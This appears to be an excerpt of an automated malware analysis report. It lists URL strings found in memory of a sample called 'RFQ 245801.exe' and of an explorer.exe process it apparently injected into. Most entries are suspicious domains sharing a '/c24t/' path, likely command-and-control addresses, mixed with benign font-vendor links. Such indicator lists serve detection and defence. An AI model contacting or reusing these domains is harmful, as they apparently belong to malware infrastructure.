Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.458881233.men/c24t/www.delark.click
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.458881233.menReferer:
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aithful.events
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aithful.events/c24t/
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aithful.events/c24t/www.ealerslot.net
Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.aithful.eventsReferer:
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000003.3482833958.000000000C9B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1749071753.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160246853.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3112813683.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyz/c24t/www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.consuyt.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.click/c24t/www.ilw.legal
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.delark.clickReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.net/c24t/www.orenzoplaybest14.xyz
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ealerslot.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bond/c24t/www.458881233.men
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.earing-tests-69481.bondReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legal/c24t/www.02s-pest-control-us-ze.fun
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ilw.legalReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travel/c24t/www.venir-bienne.info
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.j88.travelReferer:
          Source: RFQ 245801.exe, 00000000.00000002.1752637973.0000000006C72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.net/c24t/www.lc-driving-school.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.khizmetlergirisyapzzz2024.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.net/c24t/www.aithful.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.lc-driving-school.netReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.events/c24t/www.earing-tests-69481.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.oko.eventsReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyz
          Source: explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyz/c24t/
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.orenzoplaybest14.xyzReferer:
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond
          Source: explorer.exe, 00000006.00000003.3109082529.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4160751517.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3106259026.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3482766501.000000000CB64000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3107359734.000000000CB64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.ridges-freezers-56090.bond/c24t/
